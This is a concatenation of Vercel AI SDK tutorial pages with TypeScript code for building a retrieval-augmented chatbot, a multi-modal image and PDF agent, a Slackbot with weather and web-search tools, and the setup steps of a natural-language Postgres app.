import { generateEmbeddings } from '../ai/embedding';
import { embeddings as embeddingsTable } from '../db/schema/embeddings';

export const createResource = async (input: NewResourceParams) => {
  try {
    const { content } = insertResourceSchema.parse(input);

    const [resource] = await db
      .insert(resources)
      .values({ content })
      .returning();

    const embeddings = await generateEmbeddings(content);
    await db.insert(embeddingsTable).values(
      embeddings.map(embedding => ({
        resourceId: resource.id,
        ...embedding,
      })),
    );

    return 'Resource successfully created and embedded.';
  } catch (error) {
    return error instanceof Error && error.message.length > 0
      ? error.message
      : 'Error, please try again.';
  }
};

Create Root Page

Great! Let's build the frontend. The AI SDK’s useChat hook allows you to easily create a conversational user interface for your agent.

Replace your root page (app/page.tsx) with the following code.

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Chat() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();
  return (
    <div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
      <div className="space-y-4">
        {messages.map(m => (
          <div key={m.id} className="whitespace-pre-wrap">
            <div>
              <div className="font-bold">{m.role}</div>
              {m.parts.map(part => {
                switch (part.type) {
                  case 'text':
                    return <p>{part.text}</p>;
                }
              })}
            </div>
          </div>
        ))}
      </div>

      <form
        onSubmit={e => {
          e.preventDefault();
          sendMessage({ text: input });
          setInput('');
        }}
      >
        <input
          className="fixed bottom-0 w-full max-w-md p-2 mb-8 border border-gray-300 rounded shadow-xl"
          value={input}
          placeholder="Say something..."
          onChange={e => setInput(e.currentTarget.value)}
        />
      </form>
    </div>
  );
}

Run the following command to start the Next.js dev server:

You can customize the endpoint in the useChat configuration object

Create API Route

Create a file at app/api/chat/route.ts by running the following command:

Open the file and add the following code:

import { convertToModelMessages, streamText, UIMessage } from 'ai';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: 'openai/gpt-4o',
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

Head back to the browser and try to send a message again. You should see a response from the model streamed directly in!

Refining your prompt

While you now have a working agent, it isn't doing anything special.

import { convertToModelMessages, streamText, UIMessage } from 'ai';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: 'openai/gpt-4o',
    system: `You are a helpful assistant. Check your knowledge base before answering any questions.
    Only respond to questions using information from tool calls.
    if no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

In its current form, your agent is now, well, useless. How do you give the model the ability to add and query information?

Using Tools

A tool is a function that can be called by the model to perform a specific task. You can think of a tool like a program you give to the model that it can run as and when it deems necessary.

Let’s see how you can create a tool to give the model the ability to create, embed and save a resource to your agents’ knowledge base.

Add Resource Tool

Update your route handler with the following code:

import { createResource } from '@/lib/actions/resources';
import { convertToModelMessages, streamText, tool, UIMessage } from 'ai';
import { z } from 'zod';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: 'openai/gpt-4o',
    system: `You are a helpful assistant. Check your knowledge base before answering any questions.
    Only respond to questions using information from tool calls.
    if no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
    messages: await convertToModelMessages(messages),
    tools: {
      addResource: tool({
        description: `add a resource to your knowledge base.
          If the user provides a random piece of knowledge unprompted, use this tool without asking for confirmation.`,
        inputSchema: z.object({
          content: z
            .string()
            .describe('the content or resource to add to the knowledge base'),
        }),
        execute: async ({ content }) => createResource({ content }),
      }),
    },
  });

  return result.toUIMessageStreamResponse();
}

In this code, you define a tool called addResource. This tool has three elements:

description: description of the tool that will influence when the tool is picked.
inputSchema: Zod schema that defines the input necessary for the tool to run.
execute: An asynchronous function that is called with the arguments from the tool call.

Head back to the browser and tell the model your favorite food. You should see an empty response in the UI. Did anything happen? Let’s see. Run the following command in a new terminal window.

This will start Drizzle Studio where we can view the rows in our database. You should see a new row in both the embeddings and resources table with your favorite food!

Let’s make a few changes in the UI to communicate to the user when a tool has been called. Head back to your root page (app/page.tsx) and add the following code:

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Chat() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();
  return (
    <div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
      <div className="space-y-4">
        {messages.map(m => (
          <div key={m.id} className="whitespace-pre-wrap">
            <div>
              <div className="font-bold">{m.role}</div>
              {m.parts.map(part => {
                switch (part.type) {
                  case 'text':
                    return <p>{part.text}</p>;
                  case 'tool-addResource':
                  case 'tool-getInformation':
                    return (
                      <p>
                        call{part.state === 'output-available' ? 'ed' : 'ing'}{' '}
                        tool: {part.type}
                        <pre className="my-4 bg-zinc-100 p-2 rounded-sm">
                          {JSON.stringify(part.input, null, 2)}
                        </pre>
                      </p>
                    );
                }
              })}
            </div>
          </div>
        ))}
      </div>

      <form
        onSubmit={e => {
          e.preventDefault();
          sendMessage({ text: input });
          setInput('');
        }}
      >
        <input
          className="fixed bottom-0 w-full max-w-md p-2 mb-8 border border-gray-300 rounded shadow-xl"
          value={input}
          placeholder="Say something..."
          onChange={e => setInput(e.currentTarget.value)}
        />
      </form>
    </div>
  );
}

Improving UX with Multi-Step Calls

Open your root page (api/chat/route.ts) and add the following key to the streamText configuration object:

import { createResource } from '@/lib/actions/resources';
import {
  convertToModelMessages,
  streamText,
  tool,
  UIMessage,
  stepCountIs,
} from 'ai';
import { z } from 'zod';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: 'openai/gpt-4o',
    system: `You are a helpful assistant. Check your knowledge base before answering any questions.
    Only respond to questions using information from tool calls.
    if no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
    messages: await convertToModelMessages(messages),
    stopWhen: stepCountIs(5),
    tools: {
      addResource: tool({
        description: `add a resource to your knowledge base.
          If the user provides a random piece of knowledge unprompted, use this tool without asking for confirmation.`,
        inputSchema: z.object({
          content: z
            .string()
            .describe('the content or resource to add to the knowledge base'),
        }),
        execute: async ({ content }) => createResource({ content }),
      }),
    },
  });

  return result.toUIMessageStreamResponse();
}

Head back to the browser and tell the model your favorite pizza topping (note: pineapple is not an option). You should see a follow-up response from the model confirming the action.

Retrieve Resource Tool

import { embed, embedMany } from 'ai';
import { db } from '../db';
import { cosineDistance, desc, gt, sql } from 'drizzle-orm';
import { embeddings } from '../db/schema/embeddings';

const embeddingModel = 'openai/text-embedding-ada-002';

const generateChunks = (input: string): string[] => {
  return input
    .trim()
    .split('.')
    .filter(i => i !== '');
};

export const generateEmbeddings = async (
  value: string,
): Promise<Array<{ embedding: number[]; content: string }>> => {
  const chunks = generateChunks(value);
  const { embeddings } = await embedMany({
    model: embeddingModel,
    values: chunks,
  });
  return embeddings.map((e, i) => ({ content: chunks[i], embedding: e }));
};

export const generateEmbedding = async (value: string): Promise<number[]> => {
  const input = value.replaceAll('\\n', ' ');
  const { embedding } = await embed({
    model: embeddingModel,
    value: input,
  });
  return embedding;
};

export const findRelevantContent = async (userQuery: string) => {
  const userQueryEmbedded = await generateEmbedding(userQuery);
  const similarity = sql<number>`1 - (${cosineDistance(
    embeddings.embedding,
    userQueryEmbedded,
  )})`;
  const similarGuides = await db
    .select({ name: embeddings.content, similarity })
    .from(embeddings)
    .where(gt(similarity, 0.5))
    .orderBy(t => desc(t.similarity))
    .limit(4);
  return similarGuides;
};

In this code, you add two functions:

generateEmbedding: generate a single embedding from an input string
findRelevantContent: embeds the user’s query, searches the database for similar items, then returns relevant items

With that done, it’s onto the final step: creating the tool.

Go back to your route handler (api/chat/route.ts) and add a new tool called getInformation:

import { createResource } from '@/lib/actions/resources';
import {
  convertToModelMessages,
  streamText,
  tool,
  UIMessage,
  stepCountIs,
} from 'ai';
import { z } from 'zod';
import { findRelevantContent } from '@/lib/ai/embedding';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: 'openai/gpt-4o',
    messages: await convertToModelMessages(messages),
    stopWhen: stepCountIs(5),
    system: `You are a helpful assistant. Check your knowledge base before answering any questions.
    Only respond to questions using information from tool calls.
    if no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
    tools: {
      addResource: tool({
        description: `add a resource to your knowledge base.
          If the user provides a random piece of knowledge unprompted, use this tool without asking for confirmation.`,
        inputSchema: z.object({
          content: z
            .string()
            .describe('the content or resource to add to the knowledge base'),
        }),
        execute: async ({ content }) => createResource({ content }),
      }),
      getInformation: tool({
        description: `get information from your knowledge base to answer questions.`,
        inputSchema: z.object({
          question: z.string().describe('the users question'),
        }),
        execute: async ({ question }) => findRelevantContent(question),
      }),
    },
  });

  return result.toUIMessageStreamResponse();
}

Head back to the browser, refresh the page, and ask for your favorite food. You should see the model call the getInformation tool, and then use the relevant information to formulate a response!

Conclusion

Troubleshooting Migration Error

If you're using the Vercel setup above, you can run the command directly by either:

Going to the Neon console and entering the command there, or
Going back to the Vercel platform, navigating to the Quick Start section of your database, and finding the PSQL connection command (second tab). This will connect to your instance in the terminal where you can run the command directly.

More info.

title: Multi-Modal Agent description: Learn how to build a multi-modal agent that can process images and PDFs with the AI SDK. tags: ['multi-modal', 'agent', 'images', 'pdf', 'vision', 'next']

Multi-Modal Agent

In this guide, you will build a multi-modal agent capable of understanding both images and PDFs.

We'll build this agent using OpenAI's GPT-4o, but the same code works seamlessly with other providers - you can switch between them by changing just one line of code.

Prerequisites

To follow this quickstart, you'll need:

Node.js 18+ and pnpm installed on your local development machine.
A Vercel AI Gateway API key.

If you haven't obtained your Vercel AI Gateway API key, you can do so by signing up on the Vercel website.

Create Your Application

Start by creating a new Next.js application. This command will create a new directory named multi-modal-agent and set up a basic Next.js application inside it.

Navigate to the newly created directory:

Install dependencies

Install ai and @ai-sdk/react, the AI SDK package and the AI SDK's React package respectively.

<Tab>
  <Snippet text="bun add ai @ai-sdk/react" dark />
</Tab>

Configure your Vercel AI Gateway API key

Create a .env.local file in your project root and add your Vercel AI Gateway API key. This key authenticates your application with Vercel AI Gateway.

Edit the .env.local file:

AI_GATEWAY_API_KEY=your_api_key_here

Replace your_api_key_here with your actual Vercel AI Gateway API key.

Implementation Plan

To build a multi-modal agent, you will need to:

Create a Route Handler to handle incoming chat messages and generate responses.
Wire up the UI to display chat messages, provide a user input, and handle submitting new messages.
Add the ability to upload images and PDFs and attach them alongside the chat messages.

Create a Route Handler

Create a route handler, app/api/chat/route.ts and add the following code:

import { streamText, convertToModelMessages, type UIMessage } from 'ai';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: 'openai/gpt-4o',
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

Let's take a look at what is happening in this code:

Define an asynchronous POST request handler and extract messages from the body of the request. The messages variable contains a history of the conversation between you and the agent and provides the agent with the necessary context to make the next generation.
Convert the UI messages to model messages using convertToModelMessages, which transforms the UI-focused message format to the format expected by the language model.
Call streamText, which is imported from the ai package. This function accepts a configuration object that contains a model provider and messages (converted in step 2). You can pass additional settings to further customize the model's behavior.
The streamText function returns a StreamTextResult. This result object contains the toUIMessageStreamResponse function which converts the result to a streamed response object.
Finally, return the result to the client to stream the response.

This Route Handler creates a POST request endpoint at /api/chat.

Wire up the UI

Now that you have a Route Handler that can query a large language model (LLM), it's time to setup your frontend. AI SDK UI abstracts the complexity of a chat interface into one hook, useChat.

Update your root page (app/page.tsx) with the following code to show a list of chat messages and provide a user message input:

'use client';

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';

export default function Chat() {
  const [input, setInput] = useState('');

  const { messages, sendMessage } = useChat({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),
  });

  return (
    <div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
      {messages.map(m => (
        <div key={m.id} className="whitespace-pre-wrap">
          {m.role === 'user' ? 'User: ' : 'AI: '}
          {m.parts.map((part, index) => {
            if (part.type === 'text') {
              return <span key={`${m.id}-text-${index}`}>{part.text}</span>;
            }
            return null;
          })}
        </div>
      ))}

      <form
        onSubmit={async event => {
          event.preventDefault();
          sendMessage({
            role: 'user',
            parts: [{ type: 'text', text: input }],
          });
          setInput('');
        }}
        className="fixed bottom-0 w-full max-w-md mb-8 border border-gray-300 rounded shadow-xl"
      >
        <input
          className="w-full p-2"
          value={input}
          placeholder="Say something..."
          onChange={e => setInput(e.target.value)}
        />
      </form>
    </div>
  );
}

This page utilizes the useChat hook, configured with DefaultChatTransport to specify the API endpoint. The useChat hook provides multiple utility functions and state variables:

messages - the current chat messages (an array of objects with id, role, and parts properties).
sendMessage - function to send a new message to the AI.
Each message contains a parts array that can include text, images, PDFs, and other content types.
Files are converted to data URLs before being sent to maintain compatibility across different environments.

Add File Upload

Update your root page (app/page.tsx) with the following code:

'use client';

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useRef, useState } from 'react';
import Image from 'next/image';

async function convertFilesToDataURLs(files: FileList) {
  return Promise.all(
    Array.from(files).map(
      file =>
        new Promise<{
          type: 'file';
          mediaType: string;
          url: string;
        }>((resolve, reject) => {
          const reader = new FileReader();
          reader.onload = () => {
            resolve({
              type: 'file',
              mediaType: file.type,
              url: reader.result as string,
            });
          };
          reader.onerror = reject;
          reader.readAsDataURL(file);
        }),
    ),
  );
}

export default function Chat() {
  const [input, setInput] = useState('');
  const [files, setFiles] = useState<FileList | undefined>(undefined);
  const fileInputRef = useRef<HTMLInputElement>(null);

  const { messages, sendMessage } = useChat({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),
  });

  return (
    <div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
      {messages.map(m => (
        <div key={m.id} className="whitespace-pre-wrap">
          {m.role === 'user' ? 'User: ' : 'AI: '}
          {m.parts.map((part, index) => {
            if (part.type === 'text') {
              return <span key={`${m.id}-text-${index}`}>{part.text}</span>;
            }
            if (part.type === 'file' && part.mediaType?.startsWith('image/')) {
              return (
                <Image
                  key={`${m.id}-image-${index}`}
                  src={part.url}
                  width={500}
                  height={500}
                  alt={`attachment-${index}`}
                />
              );
            }
            if (part.type === 'file' && part.mediaType === 'application/pdf') {
              return (
                <iframe
                  key={`${m.id}-pdf-${index}`}
                  src={part.url}
                  width={500}
                  height={600}
                  title={`pdf-${index}`}
                />
              );
            }
            return null;
          })}
        </div>
      ))}

      <form
        className="fixed bottom-0 w-full max-w-md p-2 mb-8 border border-gray-300 rounded shadow-xl space-y-2"
        onSubmit={async event => {
          event.preventDefault();

          const fileParts =
            files && files.length > 0
              ? await convertFilesToDataURLs(files)
              : [];

          sendMessage({
            role: 'user',
            parts: [{ type: 'text', text: input }, ...fileParts],
          });

          setInput('');
          setFiles(undefined);

          if (fileInputRef.current) {
            fileInputRef.current.value = '';
          }
        }}
      >
        <input
          type="file"
          accept="image/*,application/pdf"
          className=""
          onChange={event => {
            if (event.target.files) {
              setFiles(event.target.files);
            }
          }}
          multiple
          ref={fileInputRef}
        />
        <input
          className="w-full p-2"
          value={input}
          placeholder="Say something..."
          onChange={e => setInput(e.target.value)}
        />
      </form>
    </div>
  );
}

In this code, you:

Add a helper function convertFilesToDataURLs to convert file uploads to data URLs.
Create state to hold the input text, files, and a ref to the file input field.
Configure useChat with DefaultChatTransport to specify the API endpoint.
Display messages using the parts array structure, rendering text, images, and PDFs appropriately.
Update the onSubmit function to send messages with the sendMessage function, including both text and file parts.
Add a file input field to the form, including an onChange handler to handle updating the files state.

Running Your Application

With that, you have built everything you need for your multi-modal agent! To start your application, use the command:

Head to your browser and open http://localhost:3000. You should see an input field and a button to upload files.

Try uploading an image or PDF and asking the model questions about it. Watch as the model's response is streamed back to you!

Using Other Providers

With the AI SDK's unified provider interface you can easily switch to other providers that support multi-modal capabilities:

// Using Anthropic
const result = streamText({
  model: 'anthropic/claude-sonnet-4-20250514',
  messages: await convertToModelMessages(messages),
});

// Using Google
const result = streamText({
  model: 'google/gemini-2.5-flash',
  messages: await convertToModelMessages(messages),
});

Install the provider package (@ai-sdk/anthropic or @ai-sdk/google) and update your API keys in .env.local. The rest of your code remains the same.

Where to Next?

You've built a multi-modal AI agent using the AI SDK! Experiment and extend the functionality of this application further by exploring tool calling.

title: Slackbot Agent Guide description: Learn how to use the AI SDK to build an AI Agent in Slack. tags: ['agents', 'chatbot']

Building an AI Agent in Slack with the AI SDK

In this guide, you will learn how to build a Slackbot powered by the AI SDK. The bot will be able to respond to direct messages and mentions in channels using the full context of the thread.

Slack App Setup

Before we start building, you'll need to create and configure a Slack app:

Go to api.slack.com/apps
Click "Create New App" and choose "From scratch"
Give your app a name and select your workspace
Under "OAuth & Permissions", add the following bot token scopes:
- app_mentions:read
- chat:write
- im:history
- im:write
- assistant:write
Install the app to your workspace (button under "OAuth Tokens" subsection)
Copy the Bot User OAuth Token and Signing Secret for the next step
Under App Home -> Show Tabs -> Chat Tab, check "Allow users to send Slash commands and messages from the chat tab"

Project Setup

This project uses the following stack:

Getting Started

Clone the repository and check out the starter branch

Install dependencies

Project Structure

The starter repository already includes:

Slack utilities (lib/slack-utils.ts) including functions for validating incoming requests, converting Slack threads to AI SDK compatible message formats, and getting the Slackbot's user ID
General utility functions (lib/utils.ts) including initial Exa setup
Files to handle the different types of Slack events (lib/handle-messages.ts and lib/handle-app-mention.ts)
An API endpoint (POST) for Slack events (api/events.ts)

Event Handler

First, let's take a look at our API route (api/events.ts):

import type { SlackEvent } from '@slack/web-api';
import {
  assistantThreadMessage,
  handleNewAssistantMessage,
} from '../lib/handle-messages';
import { waitUntil } from '@vercel/functions';
import { handleNewAppMention } from '../lib/handle-app-mention';
import { verifyRequest, getBotId } from '../lib/slack-utils';

export async function POST(request: Request) {
  const rawBody = await request.text();
  const payload = JSON.parse(rawBody);
  const requestType = payload.type as 'url_verification' | 'event_callback';

  // See https://api.slack.com/events/url_verification
  if (requestType === 'url_verification') {
    return new Response(payload.challenge, { status: 200 });
  }

  await verifyRequest({ requestType, request, rawBody });

  try {
    const botUserId = await getBotId();

    const event = payload.event as SlackEvent;

    if (event.type === 'app_mention') {
      waitUntil(handleNewAppMention(event, botUserId));
    }

    if (event.type === 'assistant_thread_started') {
      waitUntil(assistantThreadMessage(event));
    }

    if (
      event.type === 'message' &&
      !event.subtype &&
      event.channel_type === 'im' &&
      !event.bot_id &&
      !event.bot_profile &&
      event.bot_id !== botUserId
    ) {
      waitUntil(handleNewAssistantMessage(event, botUserId));
    }

    return new Response('Success!', { status: 200 });
  } catch (error) {
    console.error('Error generating response', error);
    return new Response('Error generating response', { status: 500 });
  }
}

You then handle three types of events: app_mention, assistant_thread_started, and message:

For app_mention, you call handleNewAppMention with the event and the bot user ID.
For assistant_thread_started, you call assistantThreadMessage with the event.
For message, you call handleNewAssistantMessage with the event and the bot user ID.

Finally, you respond with a success message to Slack. Note, each handler function is wrapped in a waitUntil function. Let's take a look at what this means and why it's important.

The waitUntil Function

This means, your API endpoint will:

Immediately respond to Slack (within 3 seconds)
Continue processing the message asynchronously
Send the AI response when it's ready

Event Handlers

Let's look at how each event type is currently handled.

App Mentions

When a user mentions your bot in a channel, the app_mention event is triggered. The handleNewAppMention function in handle-app-mention.ts processes these mentions:

Checks if the message is from a bot to avoid infinite response loops
Creates a status updater to show the bot is "thinking"
If the mention is in a thread, it retrieves the thread history
Calls the LLM with the message content (using the generateResponse function which you will implement in the next section)
Updates the initial "thinking" message with the AI response

Here's the code for the handleNewAppMention function:

import { AppMentionEvent } from '@slack/web-api';
import { client, getThread } from './slack-utils';
import { generateResponse } from './ai';

const updateStatusUtil = async (
  initialStatus: string,
  event: AppMentionEvent,
) => {
  const initialMessage = await client.chat.postMessage({
    channel: event.channel,
    thread_ts: event.thread_ts ?? event.ts,
    text: initialStatus,
  });

  if (!initialMessage || !initialMessage.ts)
    throw new Error('Failed to post initial message');

  const updateMessage = async (status: string) => {
    await client.chat.update({
      channel: event.channel,
      ts: initialMessage.ts as string,
      text: status,
    });
  };
  return updateMessage;
};

export async function handleNewAppMention(
  event: AppMentionEvent,
  botUserId: string,
) {
  console.log('Handling app mention');
  if (event.bot_id || event.bot_id === botUserId || event.bot_profile) {
    console.log('Skipping app mention');
    return;
  }

  const { thread_ts, channel } = event;
  const updateMessage = await updateStatusUtil('is thinking...', event);

  if (thread_ts) {
    const messages = await getThread(channel, thread_ts, botUserId);
    const result = await generateResponse(messages, updateMessage);
    updateMessage(result);
  } else {
    const result = await generateResponse(
      [{ role: 'user', content: event.text }],
      updateMessage,
    );
    updateMessage(result);
  }
}

Now let's see how new assistant threads and messages are handled.

Assistant Thread Messages

When a user starts a thread with your assistant, the assistant_thread_started event is triggered. The assistantThreadMessage function in handle-messages.ts handles this:

Posts a welcome message to the thread
Sets up suggested prompts to help users get started

Here's the code for the assistantThreadMessage function:

import type { AssistantThreadStartedEvent } from '@slack/web-api';
import { client } from './slack-utils';

export async function assistantThreadMessage(
  event: AssistantThreadStartedEvent,
) {
  const { channel_id, thread_ts } = event.assistant_thread;
  console.log(`Thread started: ${channel_id} ${thread_ts}`);
  console.log(JSON.stringify(event));

  await client.chat.postMessage({
    channel: channel_id,
    thread_ts: thread_ts,
    text: "Hello, I'm an AI assistant built with the AI SDK by Vercel!",
  });

  await client.assistant.threads.setSuggestedPrompts({
    channel_id: channel_id,
    thread_ts: thread_ts,
    prompts: [
      {
        title: 'Get the weather',
        message: 'What is the current weather in London?',
      },
      {
        title: 'Get the news',
        message: 'What is the latest Premier League news from the BBC?',
      },
    ],
  });
}

Direct Messages

For direct messages to your bot, the message event is triggered and the event is handled by the handleNewAssistantMessage function in handle-messages.ts:

Verifies the message isn't from a bot
Updates the status to show the response is being generated
Retrieves the conversation history
Calls the LLM with the conversation context
Posts the LLM's response to the thread

Here's the code for the handleNewAssistantMessage function:

import type { GenericMessageEvent } from '@slack/web-api';
import { client, getThread } from './slack-utils';
import { generateResponse } from './ai';

export async function handleNewAssistantMessage(
  event: GenericMessageEvent,
  botUserId: string,
) {
  if (
    event.bot_id ||
    event.bot_id === botUserId ||
    event.bot_profile ||
    !event.thread_ts
  )
    return;

  const { thread_ts, channel } = event;
  const updateStatus = updateStatusUtil(channel, thread_ts);
  updateStatus('is thinking...');

  const messages = await getThread(channel, thread_ts, botUserId);
  const result = await generateResponse(messages, updateStatus);

  await client.chat.postMessage({
    channel: channel,
    thread_ts: thread_ts,
    text: result,
    unfurl_links: false,
    blocks: [
      {
        type: 'section',
        text: {
          type: 'mrkdwn',
          text: result,
        },
      },
    ],
  });

  updateStatus('');
}

With the event handlers in place, let's now implement the AI logic.

Implementing AI Logic

The core of our application is the generateResponse function in lib/generate-response.ts, which processes messages and generates responses using the AI SDK.

Here's how to implement it:

import { generateText, ModelMessage } from 'ai';
__PROVIDER_IMPORT__;

export const generateResponse = async (
  messages: ModelMessage[],
  updateStatus?: (status: string) => void,
) => {
  const { text } = await generateText({
    model: __MODEL__,
    system: `You are a Slack bot assistant. Keep your responses concise and to the point.
    - Do not tag users.
    - Current date is: ${new Date().toISOString().split('T')[0]}`,
    messages,
  });

  // Convert markdown to Slack mrkdwn format
  return text.replace(/\[(.*?)\]\((.*?)\)/g, '<$2|$1>').replace(/\*\*/g, '*');
};

This basic implementation:

Uses the AI SDK's generateText function to call Anthropic's claude-sonnet-4.5 model
Provides a system prompt to guide the model's behavior
Formats the response for Slack's markdown format

Enhancing with Tools

The real power of the AI SDK comes from tools that enable your bot to perform actions. Let's add two useful tools:

import { generateText, tool, ModelMessage, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
import { exa } from './utils';

export const generateResponse = async (
  messages: ModelMessage[],
  updateStatus?: (status: string) => void,
) => {
  const { text } = await generateText({
    model: __MODEL__,
    system: `You are a Slack bot assistant. Keep your responses concise and to the point.
    - Do not tag users.
    - Current date is: ${new Date().toISOString().split('T')[0]}
    - Always include sources in your final response if you use web search.`,
    messages,
    stopWhen: stepCountIs(10),
    tools: {
      getWeather: tool({
        description: 'Get the current weather at a location',
        inputSchema: z.object({
          latitude: z.number(),
          longitude: z.number(),
          city: z.string(),
        }),
        execute: async ({ latitude, longitude, city }) => {
          updateStatus?.(`is getting weather for ${city}...`);

          const response = await fetch(
            `https://api.open-meteo.com/v1/forecast?latitude=${latitude}&longitude=${longitude}&current=temperature_2m,weathercode,relativehumidity_2m&timezone=auto`,
          );

          const weatherData = await response.json();
          return {
            temperature: weatherData.current.temperature_2m,
            weatherCode: weatherData.current.weathercode,
            humidity: weatherData.current.relativehumidity_2m,
            city,
          };
        },
      }),
      searchWeb: tool({
        description: 'Use this to search the web for information',
        inputSchema: z.object({
          query: z.string(),
          specificDomain: z
            .string()
            .nullable()
            .describe(
              'a domain to search if the user specifies e.g. bbc.com. Should be only the domain name without the protocol',
            ),
        }),
        execute: async ({ query, specificDomain }) => {
          updateStatus?.(`is searching the web for ${query}...`);
          const { results } = await exa.searchAndContents(query, {
            livecrawl: 'always',
            numResults: 3,
            includeDomains: specificDomain ? [specificDomain] : undefined,
          });

          return {
            results: results.map(result => ({
              title: result.title,
              url: result.url,
              snippet: result.text.slice(0, 1000),
            })),
          };
        },
      }),
    },
  });

  // Convert markdown to Slack mrkdwn format
  return text.replace(/\[(.*?)\]\((.*?)\)/g, '<$2|$1>').replace(/\*\*/g, '*');
};

In this updated implementation:

You added two tools:
- getWeather: Fetches weather data for a specified location
- searchWeb: Searches the web for information using the Exa API
You set stopWhen: stepCountIs(10) to enable multi-step conversations. This defines the stopping conditions of your agent, when the model generates a tool call. This will automatically send any tool results back to the LLM to trigger additional tool calls or responses as the LLM deems necessary. This turns your LLM call from a one-off operation into a multi-step agentic flow.

How It Works

When a user interacts with your bot:

The Slack event is received and processed by your API endpoint
The user's message and the thread history is passed to the generateResponse function
The AI SDK processes the message and may invoke tools as needed
The response is formatted for Slack and sent back to the user

The tools are automatically invoked based on the user's intent. For example, if a user asks "What's the weather in London?", the AI will:

Recognize this as a weather query
Call the getWeather tool with London's coordinates (inferred by the LLM)
Process the weather data
Generate a final response, answering the user's question

Deploying the App

Install the Vercel CLI

Deploy the app

Copy the deployment URL and update the Slack app's Event Subscriptions to point to your Vercel URL
Go to your project's deployment settings (Your project -> Settings -> Environment Variables) and add your environment variables

SLACK_BOT_TOKEN=your_slack_bot_token
SLACK_SIGNING_SECRET=your_slack_signing_secret
OPENAI_API_KEY=your_openai_api_key
EXA_API_KEY=your_exa_api_key

Head back to the https://api.slack.com/ and navigate to the "Event Subscriptions" page. Enable events and add your deployment URL.

https://your-vercel-url.vercel.app/api/events

On the Events Subscription page, subscribe to the following events.
- app_mention
- assistant_thread_started
- message:im

Finally, head to Slack and test the app by sending a message to the bot.

Next Steps

You've built a Slack chatbot powered by the AI SDK! Here are some ways you could extend it:

Add memory for specific users to give the LLM context of previous interactions
Implement more tools like database queries or knowledge base searches
Add support for rich message formatting with blocks
Add analytics to track usage patterns

title: Natural Language Postgres description: Learn how to build a Next.js app that lets you talk to a PostgreSQL database in natural language. tags: ['agents', 'next', 'tools']

Natural Language Postgres Guide

In this guide, you will learn how to build an app that uses AI to interact with a PostgreSQL database using natural language.

The application will:

Generate SQL queries from a natural language input
Explain query components in plain English
Create a chart to visualise query results

You can find a completed version of this project at natural-language-postgres.vercel.app.

Project setup

This project uses the following stack:

Next.js (App Router)
AI SDK
OpenAI
Zod
Postgres with Vercel Postgres
shadcn-ui and TailwindCSS for styling
Recharts for data visualization

Clone repo

To focus on the AI-powered functionality rather than project setup and configuration we've prepared a starter repository which includes a database schema and a few components.

Clone the starter repository and check out the starter branch:

Project setup and data

Let's set up the project and seed the database with the dataset:

Install dependencies:

Copy the example environment variables file:

Add your environment variables to .env:

OPENAI_API_KEY="your_api_key_here"
POSTGRES_URL="..."
POSTGRES_PRISMA_URL="..."
POSTGRES_URL_NO_SSL="..."
POSTGRES_URL_NON_POOLING="..."
POSTGRES_USER="..."
POSTGRES_HOST="..."
POSTGRES_PASSWORD="..."
POSTGRES_DATABASE="..."

This project uses CB Insights' Unicorn Companies dataset. You can download the dataset by following these instructions:
- Navigate to CB Insights Unicorn Companies
- Enter in your email. You will receive a link to download the dataset.
- Save it as unicorns.csv in your project root

Setting up Postgres with Vercel

To set up a Postgres instance on your Vercel account:

Go to Vercel.com and make sure you're logged in
Navigate to your team homepage
Click on the Integrations tab
Click Browse Marketplace
Look for the Storage option in the sidebar
Select the Neon option (recommended, but any other PostgreSQL database provider should work)
Click Install, then click Install again in the top right corner
On the "Get Started with Neon" page, click Create Database on the right
Select your region (e.g., Washington, D.C., U.S. East)
Turn off Auth
Click Continue
Name your database (you can use the default name or rename it to something like "NaturalLanguagePostgres")
Click Create in the bottom right corner
After seeing "Database created successfully", click Done
You'll be redirected to your database instance
In the Quick Start section, click Show secrets
Copy the full DATABASE_URL environment variable and use it to populate the Postgres environment variables in your .env file

About the dataset

The Unicorn List dataset contains the following information about unicorn startups (companies with a valuation above $1bn):

Company name
Valuation
Date joined (unicorn status)
Country
City
Industry
Select investors

Now that you have the dataset downloaded and added to your project, you can initialize the database with the following command:

Note: this step can take a little while. You should see a message indicating the Unicorns table has been created and then that the database has been seeded successfully.

Start the development server:

Your application should now be running at http://localhost:3000.

Project structure

The starter repository already includes everything that you will need, including:

Database seed script (lib/seed.ts)
